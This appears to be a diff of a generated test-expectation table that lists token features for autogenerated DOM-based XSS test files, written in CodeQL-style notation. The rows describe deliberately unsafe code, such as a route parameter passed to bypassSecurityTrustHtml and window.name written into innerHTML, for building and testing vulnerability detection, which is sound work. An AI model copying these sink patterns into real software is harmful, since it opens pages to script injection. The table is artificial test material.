autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:8 | this | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:8 | this | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:8 | this | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:18 | this.sanitizer | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:18 | this.sanitizer | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:18 | this.sanitizer | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:42 | this.sa ... ustHtml | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:42 | this.sa ... ustHtml | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | exceptional return of this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | exceptional return of this.sa ... 'foo')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | exceptional return of this.sa ... 'foo')) | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | exceptional return of this.sa ... 'foo')) | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | exceptional return of this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | this.sa ... 'foo')) | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | this.sa ... 'foo')) | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | this.sa ... 'foo')) | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:5:44:77 | this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:10:44:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:10:44:18 | sanitizer | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:10:44:18 | sanitizer | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:10:44:18 | sanitizer | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:10:44:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:20:44:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:20:44:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:20:44:42 | bypassS ... ustHtml | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:20:44:42 | bypassS ... ustHtml | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:20:44:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:56 | routeSnapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:56 | routeSnapshot | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:56 | routeSnapshot | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:56 | routeSnapshot | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:56 | routeSnapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:65 | routeSn ... aramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:65 | routeSn ... aramMap | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:65 | routeSn ... aramMap | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:65 | routeSn ... aramMap | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:65 | routeSn ... aramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:69 | routeSn ... Map.get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:69 | routeSn ... Map.get | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:69 | routeSn ... Map.get | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:69 | routeSn ... Map.get | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:69 | routeSn ... Map.get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | exceptional return of routeSn ... ('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | exceptional return of routeSn ... ('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | exceptional return of routeSn ... ('foo') | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | exceptional return of routeSn ... ('foo') | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | exceptional return of routeSn ... ('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | routeSn ... ('foo') | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | routeSn ... ('foo') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | routeSn ... ('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12076,6 +91977,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | routeSn ... ('foo') | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | routeSn ... ('foo') | enclosingFunctionName | someMethod | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:44:44:76 | routeSn ... ('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:58:44:65 | paramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:58:44:65 | paramMap | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:58:44:65 | paramMap | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:58:44:65 | paramMap | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:58:44:65 | paramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:67:44:69 | get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:67:44:69 | get | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:67:44:69 | get | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:67:44:69 | get | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:44:67:44:69 | get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:71:44:75 | 'foo' | CalleeFlexibleAccessPath | routeSnapshot.paramMap.get | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:71:44:75 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:71:44:75 | 'foo' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12083,6 +91994,161 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:71:44:75 | 'foo' | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:71:44:75 | 'foo' | enclosingFunctionName | someMethod | | autogenerated/Xss/DomBasedXss/angular2-client.ts:44:71:44:75 | 'foo' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:0 | this | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:0 | this | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNamesB | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNamesB | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNamesB | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNamesD | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNamesD | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | classNamesD | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | clsx | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:1 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:36 | import ... names'; | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:36 | import ... names'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:1:1:36 | import ... names'; | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:8:1:17 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:1:24:1:35 | 'classnames' | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:1:24:1:35 | 'classnames' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:1:24:1:35 | 'classnames' | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:2:1:2:44 | import ... edupe'; | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:2:1:2:44 | import ... edupe'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:2:1:2:44 | import ... edupe'; | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:2:8:2:18 | classNamesD | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:2:25:2:43 | 'classnames/dedupe' | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:2:25:2:43 | 'classnames/dedupe' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:2:25:2:43 | 'classnames/dedupe' | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:3:1:3:42 | import ... /bind'; | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:3:1:3:42 | import ... /bind'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:3:1:3:42 | import ... /bind'; | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:3:8:3:18 | classNamesB | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:3:25:3:41 | 'classnames/bind' | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:3:25:3:41 | 'classnames/bind' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:3:25:3:41 | 'classnames/bind' | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:4:1:4:24 | import ... 'clsx'; | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:4:1:4:24 | import ... 'clsx'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:4:1:4:24 | import ... 'clsx'; | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:4:8:4:11 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:4:18:4:23 | 'clsx' | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:4:18:4:23 | 'clsx' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:4:18:4:23 | 'clsx' | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNames | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNames | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesB | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesB | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesB | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesB | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesB | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesD | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesD | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesD | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesD | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | classNamesD | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | clsx | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | clsx | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | clsx | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | this | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | this | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | this | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:6:0 | this | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | 'arguments' object of function main | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | 'arguments' object of function main | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | 'arguments' object of function main | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | 'arguments' object of function main | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | 'arguments' object of function main | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | exceptional return of function main | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | exceptional return of function main | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | exceptional return of function main | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | exceptional return of function main | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | exceptional return of function main | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | functio ... OT OK\\n} | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | functio ... OT OK\\n} | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | return of function main | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | return of function main | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | return of function main | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello 